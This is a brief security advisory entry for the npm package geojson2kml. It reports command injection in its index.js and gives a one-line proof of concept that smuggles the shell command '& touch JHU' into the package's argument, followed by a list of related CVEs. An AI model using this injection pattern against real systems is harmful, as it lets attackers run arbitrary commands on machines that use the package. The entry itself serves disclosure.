Description
All versions of package geojson2kml are vulnerable to Command Injection via the index.js file. PoC: var a =require("geojson2kml"); a("./","& touch JHU",function(){})
Remediation
References
https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412
Related Vulnerabilities
CVE-2020-19698 Vulnerability in npm package editor.md
CVE-2018-19048 Vulnerability in maven package org.webjars:simditor
CVE-2021-3795 Vulnerability in npm package semver-regex
CVE-2023-34212 Vulnerability in maven package org.apache.nifi:nifi-jms-processors
CVE-2020-5398 Vulnerability in maven package org.springframework:spring-web